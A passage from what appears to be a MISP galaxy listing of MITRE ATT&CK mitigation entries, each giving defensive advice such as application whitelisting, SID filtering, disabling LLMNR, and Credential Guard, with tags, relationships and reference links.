Consider fully enabling User Account Control (UAC) to impede system-wide changes from illegitimate administrators. (Citation: Microsoft UAC)

The tag is: misp-galaxy:mitre-course-of-action="Control Panel Items Mitigation - T1196"

View relationships graph

Control Panel Items Mitigation - T1196 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196" with estimative-language:likelihood-probability="almost-certain"

Table 4160. Table References
Links
https://attack.mitre.org/mitigations/T1196
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx

Compiled HTML File Mitigation - T1223

Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files. (Citation: PaloAlto Preventing Opportunistic Attacks Apr 2016) Also consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Compiled HTML File Mitigation - T1223"

View relationships graph

Compiled HTML File Mitigation - T1223 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223" with estimative-language:likelihood-probability="almost-certain"

Table 4161. Table References
Links
https://attack.mitre.org/mitigations/T1223
https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913

Domain Trust Discovery Mitigation - T1482

Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)

The tag is: misp-galaxy:mitre-course-of-action="Domain Trust Discovery Mitigation - T1482"

View relationships graph

Domain Trust Discovery Mitigation - T1482 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 4162. Table References
Links
https://attack.mitre.org/mitigations/T1482
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/

Stored Data Manipulation Mitigation - T1492

Identify critical business and system processes that may be targeted by adversaries and work to secure the data related to those processes against tampering. Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk. Consider encrypting important information to reduce an adversaries ability to perform tailor data modifications. Where applicable, examine using file monitoring software to check integrity on important files and directories as well as take corrective actions when unauthorized changes are detected.

The tag is: misp-galaxy:mitre-course-of-action="Stored Data Manipulation Mitigation - T1492"

View relationships graph

Stored Data Manipulation Mitigation - T1492 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492" with estimative-language:likelihood-probability="almost-certain"

Table 4163. Table References
Links
https://attack.mitre.org/mitigations/T1492
https://www.ready.gov/business/implementation/IT

Domain Generation Algorithms Mitigation - T1483

This technique may be difficult to mitigate since the domains can be registered just before they are used, and disposed shortly after. Malware researchers can reverse-engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost. In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.

The tag is: misp-galaxy:mitre-course-of-action="Domain Generation Algorithms Mitigation - T1483"

View relationships graph

Domain Generation Algorithms Mitigation - T1483 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1483" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

Table 4164. Table References
Links
https://attack.mitre.org/mitigations/T1483
http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/
https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Transmitted Data Manipulation Mitigation - T1493

Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.

The tag is: misp-galaxy:mitre-course-of-action="Transmitted Data Manipulation Mitigation - T1493"

View relationships graph

Transmitted Data Manipulation Mitigation - T1493 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1493" with estimative-language:likelihood-probability="almost-certain"

Table 4165. Table References
Links
https://attack.mitre.org/mitigations/T1493

Runtime Data Manipulation Mitigation - T1494

Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Runtime Data Manipulation Mitigation - T1494"

View relationships graph

Runtime Data Manipulation Mitigation - T1494 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494" with estimative-language:likelihood-probability="almost-certain"

Table 4166. Table References
Links
https://attack.mitre.org/mitigations/T1494
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

LLMNR/NBT-NS Poisoning Mitigation - T1171

Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)

Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)

The tag is: misp-galaxy:mitre-course-of-action="LLMNR/NBT-NS Poisoning Mitigation - T1171"

View relationships graph

LLMNR/NBT-NS Poisoning Mitigation - T1171 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171" with estimative-language:likelihood-probability="almost-certain"

Table 4167. Table References
Links
https://attack.mitre.org/mitigations/T1171
https://adsecurity.org/?p=3299
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)

Restrict Web-Based Content - M1021

Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Web-Based Content - M1021"

View relationships graph

Restrict Web-Based Content - M1021 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1483" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Access Token - T1527" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 4168. Table References
Links
https://attack.mitre.org/mitigations/M1021

Multi-Stage Channels Mitigation - T1104

Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multi-Stage Channels Mitigation - T1104"

View relationships graph

Multi-Stage Channels Mitigation - T1104 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

Table 4169. Table References
Links
https://attack.mitre.org/mitigations/T1104
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Third-party Software Mitigation - T1072

Evaluate the security of third-party software that could be used in the enterprise environment. Ensure that access to management systems for third-party systems is limited, monitored, and secure. Have a strict approval policy for use of third-party systems.

Grant access to Third-party systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multi-factor authentication. Verify that account credentials that may be used to access third-party systems are unique and not used throughout the enterprise network. Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers in the same environment. Ensure third-party systems are regularly patched by users or the provider to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

Ensure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required.

Where the third-party system is used for deployment services, ensure that it can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the third-party system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.

The tag is: misp-galaxy:mitre-course-of-action="Third-party Software Mitigation - T1072"

View relationships graph

Third-party Software Mitigation - T1072 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 4170. Table References
Links
https://attack.mitre.org/mitigations/T1072

DLL Side-Loading Mitigation - T1073

Update software regularly. Install software in write-protected locations. Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.

The tag is: misp-galaxy:mitre-course-of-action="DLL Side-Loading Mitigation - T1073"

View relationships graph

DLL Side-Loading Mitigation - T1073 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073" with estimative-language:likelihood-probability="almost-certain"

Table 4171. Table References
Links
https://attack.mitre.org/mitigations/T1073

Re-opened Applications Mitigation - T1164

Holding the Shift key while logging in prevents apps from opening automatically (Citation: Re-Open windows on Mac). This feature can be disabled entirely with the following terminal command: <code>defaults write -g ApplePersistence -bool no</code>.

The tag is: misp-galaxy:mitre-course-of-action="Re-opened Applications Mitigation - T1164"

View relationships graph

Re-opened Applications Mitigation - T1164 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164" with estimative-language:likelihood-probability="almost-certain"

Table 4172. Table References
Links
https://attack.mitre.org/mitigations/T1164
https://support.apple.com/en-us/HT204005

SID-History Injection Mitigation - T1178

Clean up SID-History attributes after legitimate account migration is complete.

Consider applying SID Filtering to interforest trusts, such as forest trusts and external trusts, to exclude SID-History from requests to access domain resources. SID Filtering ensures that any authentication requests over a trust only contain SIDs of security principals from the trusted domain (i.e. preventing the trusted domain from claiming a user has membership in groups outside of the domain).

SID Filtering of forest trusts is enabled by default, but may have been disabled in some cases to allow a child domain to transitively access forest trusts. SID Filtering of external trusts is automatically enabled on all created external trusts using Server 2003 or later domain controllers. (Citation: Microsoft Trust Considerations Nov 2014) (Citation: Microsoft SID Filtering Quarantining Jan 2009) However note that SID Filtering is not automatically applied to legacy trusts or may have been deliberately disabled to allow inter-domain access to resources.

SID Filtering can be applied by: (Citation: Microsoft Netdom Trust Sept 2012)

Disabling SIDHistory on forest trusts using the netdom tool (<code>netdom trust <TrustingDomainName> /domain:<TrustedDomainName> /EnableSIDHistory:no</code> on the domain controller).
Applying SID Filter Quarantining to external trusts using the netdom tool (<code>netdom trust <TrustingDomainName> /domain:<TrustedDomainName> /quarantine:yes</code> on the domain controller) Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes. (Citation: Microsoft Netdom Trust Sept 2012) (Citation: AdSecurity Kerberos GT Aug 2015) If a domain within a forest is untrustworthy then it should not be a member of the forest. In this situation it is necessary to first split the trusted and untrusted domains into separate forests where SID Filtering can be applied to an interforest trust.

The tag is: misp-galaxy:mitre-course-of-action="SID-History Injection Mitigation - T1178"

View relationships graph

SID-History Injection Mitigation - T1178 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178" with estimative-language:likelihood-probability="almost-certain"

Table 4173. Table References
Links
https://attack.mitre.org/mitigations/T1178
https://technet.microsoft.com/library/cc755321.aspx
https://technet.microsoft.com/library/cc794757.aspx
https://technet.microsoft.com/library/cc835085.aspx
https://adsecurity.org/?p=1640

Multi-hop Proxy Mitigation - T1188

Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1172).

The tag is: misp-galaxy:mitre-course-of-action="Multi-hop Proxy Mitigation - T1188"

View relationships graph

Multi-hop Proxy Mitigation - T1188 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188" with estimative-language:likelihood-probability="almost-certain"

Table 4174. Table References
Links
https://attack.mitre.org/mitigations/T1188

Drive-by Compromise Mitigation - T1189

Drive-by compromise relies on there being a vulnerable piece of software on the client end systems. Use modern browsers with security features turned on. Ensure all browsers and plugins kept updated can help prevent the exploit phase of this technique.

For malicious code served up through ads, adblockers can help prevent that code from executing in the first place. Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.

The tag is: misp-galaxy:mitre-course-of-action="Drive-by Compromise Mitigation - T1189"

View relationships graph

Drive-by Compromise Mitigation - T1189 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 4175. Table References
Links
https://attack.mitre.org/mitigations/T1189
https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/
https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/
https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/
https://en.wikipedia.org/wiki/Control-flow_integrity

Data Obfuscation Mitigation - T1001

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Obfuscation Mitigation - T1001"

View relationships graph

Data Obfuscation Mitigation - T1001 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

Table 4176. Table References
Links
https://attack.mitre.org/mitigations/T1001
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Web Shell Mitigation - T1100

Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages.

Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)

The tag is: misp-galaxy:mitre-course-of-action="Web Shell Mitigation - T1100"

View relationships graph

Web Shell Mitigation - T1100 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"

Table 4177. Table References
Links
https://attack.mitre.org/mitigations/T1100
https://www.us-cert.gov/ncas/alerts/TA15-314A

Automated Exfiltration Mitigation - T1020

Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Automated Exfiltration Mitigation - T1020"

View relationships graph

Automated Exfiltration Mitigation - T1020 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 4178. Table References
Links
https://attack.mitre.org/mitigations/T1020
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Hardware Additions Mitigation - T1200

Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems.

Block unknown devices and accessories by endpoint security configuration and monitoring agent.

The tag is: misp-galaxy:mitre-course-of-action="Hardware Additions Mitigation - T1200"

View relationships graph

Hardware Additions Mitigation - T1200 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 4179. Table References
Links
https://attack.mitre.org/mitigations/T1200
https://en.wikipedia.org/wiki/IEEE_802.1X

Data Compressed Mitigation - T1002

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.

The tag is: misp-galaxy:mitre-course-of-action="Data Compressed Mitigation - T1002"

View relationships graph

Data Compressed Mitigation - T1002 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002" with estimative-language:likelihood-probability="almost-certain"

Table 4180. Table References
Links
https://attack.mitre.org/mitigations/T1002
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Credential Dumping Mitigation - T1003

Windows

Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [Valid Accounts](https://attack.mitre.org/techniques/T1078) if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)

On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA. (Citation: Microsoft LSA)

Identify and block potentially malicious software that may be used to dump credentials by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)

Manage the access control list for “Replicating Directory Changes” and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)

Consider disabling or restricting NTLM traffic. (Citation: Microsoft Disable NTLM Nov 2012)

Linux

Scraping the passwords from memory requires root privileges. Follow best practices in restricting access to escalated privileges to avoid hostile programs from accessing such sensitive regions of memory.

The tag is: misp-galaxy:mitre-course-of-action="Credential Dumping Mitigation - T1003"

View relationships graph

Credential Dumping Mitigation - T1003 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 4181. Table References
Links
https://attack.mitre.org/mitigations/T1003
https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach
https://technet.microsoft.com/en-us/library/dn408187.aspx
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx
https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard
https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard
https://adsecurity.org/?p=1729
https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr
https://technet.microsoft.com/library/jj865668.aspx

System Partition Integrity - M1004

Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.

The tag is: misp-galaxy:mitre-course-of-action="System Partition Integrity - M1004"

View relationships graph

System Partition Integrity - M1004 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"

Table 4182. Table References
Links
https://attack.mitre.org/mitigations/M1004

Network Sniffing Mitigation - T1040

Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.

Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Sniffing Mitigation - T1040"

View relationships graph

Network Sniffing Mitigation - T1040 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 4183. Table References
Links
https://attack.mitre.org/mitigations/T1040
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

New Service Mitigation - T1050

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new services.

Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="New Service Mitigation - T1050"

View relationships graph

New Service Mitigation - T1050 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 4184. Table References
Links
https://attack.mitre.org/mitigations/T1050
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Fallback Channels Mitigation - T1008

The tag is: misp-galaxy:mitre-course-of-action="Fallback Channels Mitigation - T1008"

View relationships graph

Fallback Channels Mitigation - T1008 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 4185. Table References
Links
https://attack.mitre.org/mitigations/T1008
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Binary Padding Mitigation - T1009

Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Binary Padding Mitigation - T1009"

View relationships graph

Binary Padding Mitigation - T1009 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009" with estimative-language:likelihood-probability="almost-certain"

Table 4186. Table References
Links
https://attack.mitre.org/mitigations/T1009
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Encrypt Network Traffic - M1009

Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.

iOS’s App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.

Android’s Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).

Use of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.

The tag is: misp-galaxy:mitre-course-of-action="Encrypt Network Traffic - M1009"

View relationships graph

Encrypt Network Traffic - M1009 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Rogue Wi-Fi Access Points - T1465" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Downgrade to Insecure Protocols - T1466" with estimative-language:likelihood-probability="almost-certain"
